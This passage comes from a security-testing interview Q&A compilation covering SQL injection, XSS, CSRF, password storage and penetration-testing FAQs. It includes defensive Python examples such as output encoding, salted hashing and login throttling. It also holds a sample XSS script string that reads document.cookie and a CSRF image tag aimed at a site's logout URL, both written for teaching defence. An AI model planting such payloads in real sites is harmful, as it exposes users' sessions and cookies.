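        start = 0
        for end in range(len(times)):
            # Slide the window forward until the oldest failure is within `window` of the newest.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"ip": ip, "count": end - start + 1,
                               "first": times[start].isoformat(), "last": times[end].isoformat()})
                break  # one alert per source address is enough for this demonstration
    return alerts


if __name__ == "__main__":
    for alert in detect_brute_force(SAMPLE_LOG):
        print(f"ALERT {alert['ip']}: {alert['count']} failed logins "
              f"between {alert['first']} and {alert['last']}")
```

The threshold and window are the tuning knobs: with the defaults only the burst from 203.0.113.7 is reported, while the two widely spaced failures from 198.51.100.20 are treated as ordinary typos. Lowering the threshold or widening the window trades more false positives for earlier detection of slow, spread-out guessing.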

Q5). Explain SQL injection.


Hackers commonly attack a system with the technique known as SQL injection to get at critical data.
They check for and try to find any system loophole through which they can pass a query that bypasses
the security check and returns critical data. This process is known as SQL injection; it can not only
steal the data but sometimes even crash the system.

SQL injections are quite critical, so they must be avoided. They can be avoided by periodic security testing.
SQL database security must be defined correctly, and input boxes and special characters must be handled
properly.

Q6). What are the security testing attributes?


The following attributes are considered for security testing:

- Authentication
- Confidentiality
- Authorization
- Integrity
- Availability
- Resilience
- Non-repudiation

Q7). What do you understand by Cross Site Scripting or XSS?


Cross-site scripting is a type of vulnerability that is used by hackers to attack web applications. Through
it, hackers inject HTML and JavaScript code into web pages, and through that code they steal
confidential information from the web page's cookies, which is ultimately returned to the hackers. One must
try to prevent this technique while designing the web application.
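The common fix across the XSS answers above (Q#6, Level 2 Q1, Level 3 Q9 and Q7 here) is encoding untrusted data at the point of output. Added Python example, not from the original document: a "thanks" page that reflects a stored contact-form name unencoded beside the encoded version, an encoded error message for the reflected case, and a crude self-check. The submission text is constructed. DOM-based XSS needs the same discipline on the client side (writing untrusted text via `textContent` rather than `innerHTML`), which server-side encoding alone cannot provide.

```python
import html
import re

# Constructed "Contact Us" submission containing markup. A real payload would try to read
# document.cookie and send it elsewhere, which is why HttpOnly cookies matter as a second layer.
UNTRUSTED_NAME = "<script>alert(document.cookie)</script>"


def encode(text):
    """HTML-encode untrusted text for insertion into element content or a quoted attribute."""
    return html.escape(text, quote=True)


def render_thanks_unsafe(name):
    # BAD (stored XSS): the stored name is pasted into the page unchanged, so its markup runs.
    return f"<p>Thanks for your message, {name}!</p>"


def render_thanks_safe(name):
    # GOOD: encode at output time; the browser displays the text and never parses it as markup.
    return f"<p>Thanks for your message, {encode(name)}!</p>"


def render_error_safe(search_term):
    # Reflected case: a query parameter echoed straight back in an error message, encoded.
    # The quote=True in encode() also covers the double-quoted attribute context.
    return f'<p class="error">No results for "{encode(search_term)}"</p>'


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(page):
    """Crude self-check for the demo: is there an un-encoded <script tag in the output?"""
    return bool(SCRIPT_TAG.search(page))


if __name__ == "__main__":
    print(render_thanks_unsafe(UNTRUSTED_NAME))
    print(render_thanks_safe(UNTRUSTED_NAME))
    print(render_error_safe('a"b'))
```

The encoding has to match the context the data lands in: the entity encoding shown here is right for element content and quoted attributes, while data placed inside a script block, a URL or a CSS value needs the encoder for that context.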

Q8). Differentiate SSL Connection and SSL Session.


An SSL (Secure Sockets Layer) connection is a transient connection that is established to set up
peer-to-peer communication. Each such connection has one SSL session.
An SSL session is defined as an association between client and server. Usually the handshake
protocol is used to create these sessions. The parameters defined for a session may be
shared by multiple SSL connections.

Q9). Explain “Penetration Testing”.


Penetration testing is done to identify and detect system vulnerabilities. In this testing manual and
automated techniques are used to detect system vulnerabilities. After identifying a vulnerability,
testers try to find more vulnerabilities associated with it by accessing the system more deeply.

This testing helps in protecting the system from any possible attack. Testers perform this testing in two
ways: white box testing and black box testing.

In white box testing, all information is available to the testers, while in black box testing
the testers test the system in a real-world environment without any information and find the
vulnerabilities.

Why should Penetration testing be used?


Penetration testing must be used by testers for the following reasons:

- As threats and attacks can happen at any time, loopholes and security breaches can be
very costly. Hackers can not only steal information but also crash the system.

- As hackers adopt new ways of hacking every day, it may sometimes be difficult to protect the
information all the time. So testers must perform the testing periodically to detect and prevent
attacks.

- Penetration testing protects the system from the above-mentioned attacks and helps
organizations keep their data safe.

Security Testing Questions & Answers for Experienced

Q11). How can the password file be protected?


The following two techniques are used to protect the password file:

 Hashed passwords: passwords are never stored in clear text, only a one-way hash of each password, so a
leaked file does not directly reveal the passwords. A random per-user salt value is mixed into the hash so
that two users with the same password get different hashes and precomputed (rainbow) tables are useless.

 Password file access control: the file, or at least the hashes, is readable only by privileged accounts, as
in the split between the world-readable /etc/passwd and the root-only /etc/shadow on Unix systems.
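Both techniques in working form, as an added example that is not part of the original page: a salted PBKDF2 hash record per user, constant-time verification, and a password file written with owner-only permissions. The iteration count, salt size and record format are assumptions of this example, as is the sample user data.

```python
import hashlib
import hmac
import os
import stat
import tempfile

# Work factor and salt size are assumptions for this example; tune the
# iteration count to your hardware (OWASP suggests 600,000 for PBKDF2-HMAC-SHA256).
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Return a self-describing record 'pbkdf2_sha256$iterations$salt_hex$hash_hex'.

    A fresh random salt per user means two users with the same password get
    different records, and precomputed (rainbow) tables are useless.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, record):
    """Recompute the hash with the stored salt and parameters; compare in constant time."""
    try:
        algo, iterations, salt_hex, hash_hex = record.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(hash_hex))


def write_password_file(path, records):
    """Write 'user:record' lines to a file that only its owner can read (mode 0600)."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        for user, record in records.items():
            f.write("%s:%s\n" % (user, record))
    os.chmod(path, 0o600)  # the O_CREAT mode is masked by umask; enforce it explicitly


def password_file_is_private(path):
    """True if no group/other permission bits are set (POSIX only)."""
    if os.name != "posix":
        return True  # Windows ACLs are not expressed in st_mode; not checked here
    mode = os.stat(path).st_mode
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0


def demo():
    """Hash two users' (constructed) passwords, store them privately, and verify logins."""
    records = {
        "alice": hash_password("correct horse battery staple"),
        "bob": hash_password("correct horse battery staple"),  # same password, different salt
    }
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "shadow")
        write_password_file(path, records)
        private = password_file_is_private(path)
    return {
        "alice_ok": verify_password("correct horse battery staple", records["alice"]),
        "alice_wrong": verify_password("Tr0ub4dor&3", records["alice"]),
        "salts_differ": records["alice"] != records["bob"],
        "file_private": private,
    }


if __name__ == "__main__":
    print(demo())
```

The record carries its own algorithm, iteration count and salt, so the work factor can be raised later for new records without breaking verification of old ones; hmac.compare_digest avoids leaking how many bytes of the hash matched through timing.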


Q12). What are the most used abbreviations and full forms that are used for Software security?
Below-listed abbreviations are used in software security and they are given with their full-forms:

 OSI- Open System Interconnection

 ISDN- Integrated Services Digital Network

 DDS-Digital Data System

 FTP-File Transfer Protocol

 GOSIP-Government Open System Interconnection Profile

 CHAP-Challenge Handshake Authentication Protocol

 SSH-Secure Shell

 DES-Data Encryption Standard

 DBA-Dynamic Bandwidth Allocation

 COPS-Common Open Policy Services

 BONDING- Bandwidth On Demand Interoperability Group

 ISAKMP-Internet Security Association and Key Management Protocol

 USM- User-based Security Model

 TLS-Transport Layer Security

 IPSec-Internet Protocol Security, a protocol suite for authenticating and encrypting IP traffic

Q13). What are the factors that can cause vulnerability?


The following factors can cause vulnerabilities:

 Passwords - If attackers learn a password they can steal information easily. A password policy must
be enforced to reduce this risk.
 Design flaws - Loopholes caused by design flaws allow attackers to attack the system easily.

 Human error - Human errors must be identified, since they are one of the biggest sources of
vulnerabilities.

 Management - Poor data management can also lead to many vulnerabilities, so it must be
identified too.

 Complexity - Complex code is harder to reason about and to test, so it is more likely to contain
vulnerabilities.

Q14). Define ISO 17799.


ISO/IEC 17799 is an international standard, derived from the British Standard BS 7799, that defines a code
of practice for information security management; it was renumbered ISO/IEC 27002 in 2007. Its guidelines
apply to organizations of all sizes, small, medium and large.

Q15). What are the types of testing?


Testing can be of following types:

 White Box: In this type of testing all information about the system is provided to the testers.

 Black Box Testing: In this type of testing no information is provided to the testers and they test
the application as an outside attacker would in a real-world scenario.

 Grey Box Testing: Partial information is provided to the testers; the rest they have to discover
themselves.

Q16). As per the OSSTMM, which seven security testing types exist?
As per the Open Source Security Testing Methodology Manual (OSSTMM) the following seven types of testing
exist:

 Security Scanning: identifying network and system weaknesses, followed by analysis of how to reduce the
risk they pose.

 Vulnerability Scanning: automated software scans a system against a database of known vulnerability
signatures.

 Risk Assessment: analysis of the risks to the system, classified as low, medium or high, with
recommended controls for each.
 Security Auditing: an internal inspection of applications and operating systems for security flaws,
which may include line-by-line review of the code.

 Ethical Hacking: attacking an organization's systems with its permission in order to uncover flaws
before a real attacker does.

 Posture Assessment: combines security scanning, ethical hacking and risk assessment to show the
overall security posture of an organization.

 Penetration Testing: simulates an attack to identify the vulnerabilities of a system and how far they
can be exploited.

Q17). Explain the WSDL and SOAP.


SOAP (Simple Object Access Protocol) is an XML-based protocol for exchanging structured information,
usually over HTTP. The SOAP client wraps the request in a SOAP envelope and sends it to the server; the
server processes it and responds with a SOAP message.

WSDL (Web Services Description Language) is an XML-based language that describes a web service: the
operations it offers, the message formats they use and the endpoint where the service can be accessed.
Service registries such as UDDI publish WSDL descriptions so that clients can discover and use the service.

Question 1. Do You Filter Ports On The Firewall?


Answer :
You can filter ports on the firewall to block services you do not offer and to keep unnecessary
traffic off the network. For instance, some companies block port 21, the FTP control port, when the
company does not host or allow FTP communications. Note that port filtering only limits exposure; malware
that uses an allowed port, such as 443, passes through unless the traffic itself is inspected.
Question 2. How Does Traceroute Or Tracert Work?
Answer :
traceroute (tracert on Windows) determines the route that packets take from the host computer to a remote
machine. It sends probes with an increasing IP time-to-live (TTL): each router that decrements the TTL to
zero returns an ICMP Time Exceeded message, which reveals that hop's address. It is used to identify
whether packets are redirected, where latency is introduced, and the number of hops needed to reach a host.
Question 3. What Are The Strengths And Differences Between Windows And Linux?
Answer :
Linux has commands and tooling that Windows does not, and it is open source, so its code can be audited by
anyone; Windows is closed source. Note that Heartbleed was a flaw in the OpenSSL library, not in Linux
itself: it affected any system, Windows included, that ran a vulnerable OpenSSL build, and neither platform
is immune to recent vulnerabilities.
Question 4. How Can You Encrypt Email Messages?
Answer :
You can use PGP to encrypt email messages, or another public/private key pair system such as S/MIME, so
that only the holder of the recipient's private key can read the message.
Question 5. What Kind Of Penetration Can Be Done With The Diffie Hellman Exchange?
Answer :
Because neither side of a plain Diffie-Hellman exchange is authenticated, an attacker can run a
man-in-the-middle attack: they perform a separate exchange with each party and then relay, read or modify
the traffic between them. The defence is to authenticate the exchanged values, for example with digital
signatures under certificates as TLS does, or with a pre-shared key.
Question 6. How Do You Add Security To A Website?
Answer :
HTTP supports authentication for protected pages and directories (for example HTTP Basic or Digest
authentication). If the user does not supply a valid username and password, the server returns a 401
Unauthorized response with a WWW-Authenticate header; 403 Forbidden is returned when the credentials are
valid but the user is not allowed to access the resource. Authentication alone is not enough: the site
should also be served over HTTPS so that credentials and session cookies are not sent in the clear.
Question 7. What Are Some Ways To Avoid Brute Force Hacks?
Answer :
You can stop accepting authentication attempts and lock the account after a certain number of failures.
You can also block IP addresses that flood the service, using IP restrictions on the firewall or the server,
and slow repeated attempts down with rate limiting.
Question 8. What Type Of Tools Are There Out There For Packet Sniffing?
Answer :
Wireshark is probably the most common packet sniffing tool, with tcpdump as the usual command-line
equivalent. These programs can help you find odd traffic across the network or identify a program that is
silently sending traffic from a host.
Question 9. What Is The Difference Between Asymmetric And Symmetric Encryption?
Answer :
Symmetric encryption uses the same key for encryption and decryption, so that key has to be shared secretly
in advance. Asymmetric encryption uses a key pair: data encrypted with the public key can only be decrypted
with the corresponding private key, so no secret has to be exchanged beforehand.
Question 10. Why Should We Conduct A Penetration Test?
Answer :
IT is an integral part of every company's business today. Therefore not only does the amount of business-
critical data stored on IT systems grow, but so does the dependency on a working IT infrastructure.
This leads to an increasing number of attacks against IT systems in the form of industrial espionage,
denial of service attacks and other ways to significantly harm a company. Important corporate
secrets are spied on and sold to competitors.
The availability of systems is interrupted, and a non-working IT causes more and more problems today.
No new orders are placed, because competitors somehow always have the better offer. A penetration
test gives you information about your systems' vulnerabilities, how probable a successful attack against
your infrastructure is and how you can protect yourself against potential security breaches in the future.
Question 11. Are There Legal Requirements For Penetration Tests?
Answer :
It may not be mandatory for corporations to do a penetration test, but German law, for example,
includes numerous passages in its commercial laws whose compliance could be validated by conducting a
penetration test.
Question 12. What Is The Workflow Of A Penetration Test?
Answer :
In advance of every penetration test, an individual meeting is held. In this meeting, the various
possibilities of a penetration test in relation to the customer's systems are discussed. A penetration test
only makes sense if it is realised in an individual and customer-oriented way.

Question 13. What Time Investment Do You Estimate For A Penetration Test?
Answer :
The time investment for a penetration test varies from case to case depending on the systems to be
tested and the individual test requirements. Usually, the time needed ranges from a few days to several
weeks. One goal of the preliminary meeting is to get enough information about the systems to be tested
to estimate the optimal length for the penetration test.
Human resources on the customer's side are usually only marginally required. Most notably, a contact
person for questions during the exploitation phase is needed.
Question 14. How Much Information Does Redteam Pentesting Need From Us?
Answer :
The type and amount of information needed varies with the kind of penetration test that is to be
conducted. The two concepts mentioned most often are blackbox and whitebox tests. Unfortunately,
those terms are not defined by a standard and can therefore mean different things, depending on who
you talk to.
RedTeam Pentesting usually recommends a whitebox test. Penetration tests performed as complete
blackbox tests always suffer from the fact that third parties might get involved without their explicit
consent. Providing technical information in a whitebox test scenario before the test starts also allows the
penetration testers to detect security vulnerabilities that are of importance to your company even faster
and more efficiently.
It should always be acted on the assumption that real, serious attackers are able to obtain the necessary
information prior to their attacks, or can procure it in time. A precise determination about what
information is necessary to conduct an efficient test is done individually for every client during a
preliminary meeting.
Question 15. What Are Blackbox And Whitebox Tests?
Answer :
A blackbox test is normally defined as a test where the penetration testers do not have any more
information than attackers without internal knowledge might have. The idea is to check how deeply
potential attackers can compromise your systems without any kind of internal information or access. All
knowledge has to be gathered with classical reconnaissance (finding as much information as possible
about the target) and enumeration (a deeper look at individual systems).
Despite the requirement of having as little information in the beginning as possible, at least a few
specifications for the test have to be given, so as not to unwillingly target uninvolved third parties. This does
not pose a restriction for real attackers, but for every reputable company it should go without saying that
all phases of a penetration test are only performed where explicit consent is given. This is not the case
for third party systems, that would for example be affected by a portscan of a range of systems that
presumably belong to the client the penetration test is conducted for.
In contrast, there is the whitebox test (sometimes also denoted as crystal-box test). In a whitebox test,
the penetration testers already have internal knowledge about the target systems (for example network
plans or a web application's source code) and possibly various access permissions. The latter could be an
unprivileged user account to the company network, as it is available to employees, or login credentials
for a web application like any normal customer would have.
This allows to test to what extent users with access to a system can misuse their permissions.
Additionally, internal information may be provided that is also available to every staff member of
company. This can be information about internal systems like web servers, mail servers, LDAP servers
etc., but also for example organisational structures like employee's responsibilities and positions in the
company. If only selected parts of information are divulged, this kind of test is also often called a graybox
test.
Question 16. Why Should Not Only The Network Perimeter Be Tested, But Also The Internal Network?
Answer :
If your company's network is sufficiently hardened at the perimeter systems and it was not possible to
successfully compromise it during a perimeter test, it still makes sense to additionally conduct an
internal test. Just because the perimeter systems are sufficiently secured, it does not mean that the
same precautions are taken on the internal network. Most of the time, too little security is done on the
internal network, as it is supposedly only accessible by trustworthy persons. Especially in larger
corporations though, not every employee needs the same access permissions.
The intern does not need to have the same access level as the CEO. It is therefore a severe problem if a
security vulnerability appearing in the future that allows access to the internal network eliminates all
safety precautions. If the financial incentive is big enough, it should also be no problem for attackers
(competitors, business rivals) to either bribe one of your staff members or infiltrate your organization
with somebody reporting back to them with all the data that is supposedly well guarded if seen from the
outside.
Question 17. What Types Of Systems Does Redteam Pentesting Test?
Answer :
RedTeam Pentesting tests all kinds of systems. Frequently, the security vulnerabilities that matter the
most are independent from the system's technology, making it possible to successfully test even
previously unknown types of systems. Additionally, it goes with the job of being a penetration tester to
have the ability to quickly adapt to new situations and systems.
Additionally, RedTeam Pentesting's service is not limited to the classic network- or web application
penetration test. Newly developed hardware and other products are also tested, as well as security
concepts only existing as a draft at the time of testing. In some particular cases, a penetration test
conducted in response to the detection of a security incident can help in identifying the vulnerabilities
exploited and in fixing them in a timely manner.
Question 18. Can Any Harm Be Done To Our Productive Systems During The Test?
Answer :
Unlike real attackers, RedTeam Pentesting pays great attention to a customer's production systems, so as
to not interrupt them. We always go to the greatest extent to leave all systems unharmed in a
penetration test. Attacks where the risk of a system failure is especially high are only performed with the
client's explicit consent.
All in all, it is never possible to completely rule out that a production system crashes in a penetration
test. To be able to get hold of someone as fast as possible in such a situation, emergency telephone
numbers are exchanged prior to the test.
Question 19. Are Denial-of-service Attacks Also Tested?
Answer :
Denial-of-service (DoS) attacks are usually only examined if it seems to be possible to put a system's
availability at risk with very small effort. This can for example be a misconfiguration or a program
error (say, if a system crashes when it gets sent an overly long request). Attacks like this will only be
performed after an explicit agreement is provided, to verify if the attack is indeed possible.
On the other hand, attacks that try to saturate the bandwidth a company has at its disposal are
usually not tested, as this is always possible for attackers with sufficient resources and will also affect
third-party systems. Distributed denial-of-service attacks, that usually involve hundreds, if not
thousands, of zombie systems (systems that were compromised and can now be remotely controlled)
cannot be simulated realistically.
Question 20. Does Redteam Pentesting Do Social Engineering?
Answer :
Penetration tests may include social engineering techniques. These techniques are not without
controversy though. More detailed information about the problems occurring with social engineering
in penetration tests is available under "exploitation". One safety measure against social engineering
attacks is training for your employees.
Question 21. What Happens To Confidential Data Redteam Pentesting Gathers During The Penetration Test?
Answer :
RedTeam Pentesting commits itself to absolute secrecy regarding your confidential data. A non-
disclosure agreement (NDA) determining that RedTeam Pentesting treats a client's data as
confidential is already part of every contract. All customer data, including information that is used to
prepare a first quotation, is subject to the same obligation to confidentiality. At the end of a
penetration test, all data and possible storage media is either securely destroyed or handed back to
the client.
Question 22. Are The Results Written Down In A Report?
Answer :
Every client gets a detailed report at the end of a penetration test. A typical report includes a non-
technical executive summary of the results, to give a short and precise overview of the current status,
followed by a more extensive technical explanation for administrators, developers or other technical
staff.
The individual problems enumerated in the report are separated into a detailed description, a risk
analysis and proposed solutions, to directly give suggestions for improvement.
Question 23. What Other Products And Services Does Redteam Pentesting Offer?
Answer :
RedTeam Pentesting specialises in penetration tests and does not offer any other services. In particular,
no products or services are sold after a penetration test, to guarantee independent and objective test
results. The specialisation also ensures that RedTeam Pentesting's employees have a lot of experience
and expert knowledge for conducting penetration tests.

Question 24. Can We Get A List Of Redteam Pentesting's References?


Answer :
Among RedTeam Pentesting's clients are national and international companies of all trades, including
the following:
• Trade & industry
• Banking & insurance companies
• Public administration & authorities
• IT service providers & data centres
Because our customers set a high value on confidentiality, RedTeam Pentesting cannot publish a
reference list. However, to get a first impression of our capabilities you can take a look at a selection
of published testimonials, in which some of our customers report about their experience with
RedTeam Pentesting.
Question 25. How Is Redteam Pentesting Different From Other Companies That Offer Penetration Tests?
Answer :
RedTeam Pentesting specialises exclusively in penetration tests, in contrast to many other companies
in IT-security for which penetration tests are one of many business offerings. As the expertise for
conducting a penetration test with specialized security experts is absent in many cases, quite often
automated security scans are sold as penetration tests. Customers of such service providers most
often receive a printout of the program's findings as the result of the »penetration test«.
RedTeam Pentesting in contrast employs security specialists who do close teamwork to achieve the
best results. The results are documented in a detailed report by the penetration testers that
performed the test, with the ambition to communicate the necessary knowledge about the
vulnerabilities in an understandable way. For our customers, this means that vulnerabilities can be
better comprehended and issues solved more efficiently. RedTeam Pentesting particularly does not
sell any other services before or after a penetration test. The penetration test should not serve to sell
extra services, but should be an independent security examination.
Additionally, all of RedTeam Pentesting's employees are permanent employees and publicly listed on
our website. Even during workload peaks, no subcontractors or freelancers are hired, to guarantee
the high quality of the tests as well as strict confidentiality.
Question 26. In What Countries Does Redteam Pentesting Offer Penetration Tests?
Answer :
RedTeam Pentesting works for many international customers. The project language for penetration
tests is either English or German. Depending on specific customer demands, penetration tests can be
performed locally at the client's premises, or via the Internet or other means of remote access. It is of
course also possible to conduct a penetration test on a client's test system in RedTeam Pentesting's
laboratory, for example in case of a product pentest.

Question 27. What Is Network Penetration Testing?


Answer :
A penetration test, also referred to as “pentest”, is a method of evaluating the security of a computer
system or network by simulating an attack from malicious outsiders (without any authorised means of
accessing the company's networks) but also malicious insiders (who have some level of authorised
access).
The process involves an active analysis of the system for any potential vulnerabilities that could result
from poor or improper system configuration, known and unknown hardware or software flaws, or
operational weaknesses.
The analysis is carried out from the position of a potential hacker and can involve active exploitation of
security vulnerabilities.
Question 28. Is Network Penetration Testing The Same As Network Vulnerability Assessment?
Answer :
There are many names for this type of security service. Network vulnerability assessment, network
audit, network vulnerability scan, network penetration testing, they may all mean the same thing.
BorderSecure is the name of Omniquad's network penetration service.
Question 29. Why Is It Critical To Have An On-going Assessment Of Your Networks’ Security?
Answer :
As new security issues and flaws with different products are made public on a daily basis, it is
important to carry out regular checks in order to maintain a secure network. We check for holes in
your Internet infrastructure, and the ideal way to stay secure on the Internet is to stay ahead of
hackers, at all times.
Question 30. Why Should A Third Party Assess Your System?
Answer :
If you have your own IT department implement your security system, it is to your advantage to let an
impartial third party do the audit. We provide an outsiders view on how easy/difficult it is to
compromise your integrity. Having an audit report from a third party outlining all confirmed security
vulnerabilities on the network provides invaluable information to any network administrator.
The service is fast, and you will have the advantage of continually knowing how secure your network
is and what you can do to improve it.
Question 31. What Is Omniquad Bordersecure?
Answer :
Omniquad BorderSecure is a service that performs network audits or network penetration testing —
it identifies security vulnerabilities and weaknesses on networks. The information can be used to
assess security, manage risks, and eliminate security vulnerabilities before third parties can take
advantage of potential security holes on your network. Omniquad BorderSecure is a service that can
tell you how hackers can gain access to your networks, and help you prevent such a security breach.
Question 32. We Have A Firewall In Place. Do We Still Need Network Penetration Testing If We Have
A Firewall?
Answer :
The simple answer is yes. Network penetration testing is especially important if you have a Firewall,
as it forms a part of your assessment of your Firewalls efficiency. Performing a network scan or
penetration test when you have a firewall will test the settings on your Firewall. It is important to test
your Firewall each time you have made upgrades or changes to the settings, to ensure it is protecting
your network the way it should.
Question 33. Will Firewalls Interfere With Omniquad Bordersecure?
Answer :
Firewalls are an essential part of network security. Omniquad BorderSecure assesses firewall's
effectiveness in addition to applications and protocols such as web, FTP, and e-mail that are
frequently accessible through firewalls. The system also looks for holes in the firewall; it is often the
case that misconfigured firewalls pose security threats.
Question 34. Can I Target Any Ip Address?
Answer :
Yes we can check any and as many IP addresses as you want provided they belong to you. We will not
check any third party IP address.
Question 35. Is Network Penetration Testing Safe?
Answer :
Yes it is completely safe, skilled Omniquad engineers are probing your network from outside your
organisation. However, if there should be any glitches, it is better that it happens under a controlled
sweep of your network since this in itself is exposing network vulnerabilities, some of which could
indicate that your business would be defenceless to Denial of Service attacks.
Question 36. Is The Service Host-based Or Network-based?
Answer :
Omniquad BorderSecure is host-based (on a dedicated server) outside your network. The service
checks your network via the Internet — much like a hacker would try to break into your company
from the outside. This gives you a realistic analysis of your network vulnerabilities.
Question 37. How Many Different Types Of Vulnerabilities Can Omniquad Bordersecure Detect?
Answer :
Omniquad BorderSecure runs scans and audits on all types of networks. Our team tests new
vulnerabilities for ensuring that our knowledge database remains comprehensive at all times, and
currently we check for up to 1000 different vulnerabilities.
Question 38. What Happens After Omniquad Bordersecure Detects Vulnerabilities On My Network?
Answer :
Omniquad BorderSecure provides a detailed report outlining each vulnerability, including: The
vulnerable host(s), Operating system weaknesses, Level of security risk of the vulnerability,
Description of the vulnerability, Recommendation for correcting the problem.
Question 39. Does Bordersecure Fix Vulnerabilities Found Automatically?
Answer :
No, we point out the weaknesses and recommend solutions. It is not advisable to perform automatic
fixes, even if it was possible, since this could cause a variety of concerns. BorderSecure informs you
about security risks, it is your responsibility to follow up the recommendations to secure your
network perimeter. However, we can offer advice should this be necessary.
Question 1. Describe The Last Program Or Script That You Wrote. What Problem Did It Solve?
Answer :
All we want to see here is if the color drains from the guy’s face. If he panics then we not only know
he’s not a programmer (not necessarily bad), but that he’s afraid of programming (bad). I know it’s
controversial, but I think that any high-level security guy needs some programming skills. They don’t
need to be a God at it, but they need to understand the concepts and at least be able to muddle
through some scripting when required.
Question 2. How Would You Implement A Secure Login Field On A High Traffic Website
Where Performance Is A Consideration?
Answer :
We're looking for a basic understanding of the issue: wanting to serve the front page over plain HTTP for
performance while needing to present the login form, and submit the credentials, over HTTPS, and how they'd
recommend doing that. A key piece of the answer should centre on avoiding the MITM threat posed by pure
HTTP: a form served over HTTP can be altered in transit even if it posts to an HTTPS URL, so the form itself
has to come over HTTPS. Blank stares here mean that they've never seen or heard of this problem, which
means they're not likely to be anything near pro level.
Question 3. What Are The Various Ways To Handle Account Brute Forcing?
Answer :
Look for discussion of account lockouts, IP restrictions, rate limiting, fail2ban, etc.
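The controls named here and in Question 7 above (lockout after repeated failures, blocking a flooding IP), as an added example that is not part of the original page. The thresholds, the in-memory user table with a plain-text password compare, and the replayed attack sequence are all constructed for this example; a real deployment would check against hashed passwords and keep the counters in shared storage.

```python
import time
from collections import defaultdict, deque


class LoginGuard:
    """Throttles login attempts: per-account lockout plus a per-IP rate limit.

    Decisions are made before the password is checked, so an attacker gets no
    signal about whether the username exists. The clock is injectable so the
    policy can be tested without sleeping.
    """

    def __init__(self, max_failures=5, lockout_seconds=900,
                 ip_limit=20, ip_window_seconds=60, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.ip_limit = ip_limit
        self.ip_window = ip_window_seconds
        self.clock = clock
        self.failures = defaultdict(int)       # username -> consecutive failures
        self.locked_until = {}                 # username -> time the lockout ends
        self.ip_attempts = defaultdict(deque)  # ip -> timestamps of recent attempts

    def _prune(self, ip, now):
        q = self.ip_attempts[ip]
        while q and now - q[0] > self.ip_window:
            q.popleft()

    def check(self, username, ip):
        """Return 'ok', 'account_locked' or 'ip_blocked' for an incoming attempt."""
        now = self.clock()
        self._prune(ip, now)
        if len(self.ip_attempts[ip]) >= self.ip_limit:
            return "ip_blocked"
        self.ip_attempts[ip].append(now)
        if self.locked_until.get(username, 0) > now:
            return "account_locked"
        return "ok"

    def record_failure(self, username):
        self.failures[username] += 1
        if self.failures[username] >= self.max_failures:
            self.locked_until[username] = self.clock() + self.lockout_seconds
            self.failures[username] = 0

    def record_success(self, username):
        self.failures.pop(username, None)
        self.locked_until.pop(username, None)


def attempt_login(guard, users, username, password, ip):
    """Full login path: throttle first, then verify (plain-text compare is for the demo only)."""
    verdict = guard.check(username, ip)
    if verdict != "ok":
        return verdict
    if users.get(username) == password:
        guard.record_success(username)
        return "success"
    guard.record_failure(username)
    return "failed"


def simulate(clock=time.monotonic):
    """Replay a constructed attack: one IP guesses alice's password, then sprays other accounts."""
    guard = LoginGuard(max_failures=3, lockout_seconds=300, ip_limit=10,
                       ip_window_seconds=60, clock=clock)
    users = {"alice": "correct horse battery staple"}
    outcomes = []
    for guess in ["password", "123456", "letmein", "qwerty"]:
        outcomes.append(attempt_login(guard, users, "alice", guess, "203.0.113.7"))
    # The correct password is refused while the account is locked.
    outcomes.append(attempt_login(guard, users, "alice", users["alice"], "203.0.113.7"))
    # Spraying other usernames from the same IP runs into the per-IP limit.
    for i in range(8):
        outcomes.append(attempt_login(guard, users, "user%d" % i, "x", "203.0.113.7"))
    return outcomes


if __name__ == "__main__":
    print(simulate())
```

Two design points worth discussing in an interview: the account lockout is time-limited, because a permanent lockout lets an attacker deny service to any user by guessing wrong on purpose; and the per-IP counter is pruned by a sliding window, because a fixed window lets an attacker burst twice the limit across the boundary.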
Question 4. What Is Cross-site Request Forgery?
Answer :
Not knowing this is more forgivable than not knowing what XSS is, but only for junior positions. Desired
answer: when an attacker gets a victim's browser to make requests to a site, ideally with the victim's
credentials (cookies) attached automatically, without the victim knowing. A solid example of this is an IMG
tag whose src points to a URL associated with an action.
Example: an attacker's page containing <img src="http://www.wisdomjobs.com/logout/">. A victim just loading
that page could get logged out of that site, and their browser would have performed the action, not them
(since browsers load all IMG tags automatically and send the cookies for the target domain with the request).

Question 6. If You Were A Site Administrator Looking For Incoming Csrf Attacks, What Would You Look
For?
Answer :
This is a fun one, as it requires them to set some ground rules. Desired answers are things like, “Did we
already implement nonces?”, or, “That depends on whether we already have controls in place…”
Undesired answers are things like checking referrer headers, or wild panic.
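The nonce-based control mentioned in the answer, as an added example that is not part of the original page: a per-session synchronizer token that the legitimate form carries and a forged cross-site request cannot. The in-memory session store, the /logout handler signature and the replayed requests are constructed for this example.

```python
import hmac
import secrets
from html import escape

# In-memory stand-in for the server's session store; real apps keep this server-side too.
SESSIONS = {}   # session_id (sent as a cookie) -> {"user": ..., "csrf": ...}


def login(user):
    """Create a session and bind a fresh CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def render_logout_form(sid):
    """The legitimate form embeds the session's token as a hidden field."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="post" action="/logout">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<button>Log out</button></form>' % escape(token, quote=True))


def handle_logout(method, cookies, form):
    """Server side of /logout: the cookie identifies the session, the token proves intent."""
    if method != "POST":
        return 405, "state changes must not be reachable via GET (an <img> fetch is a GET)"
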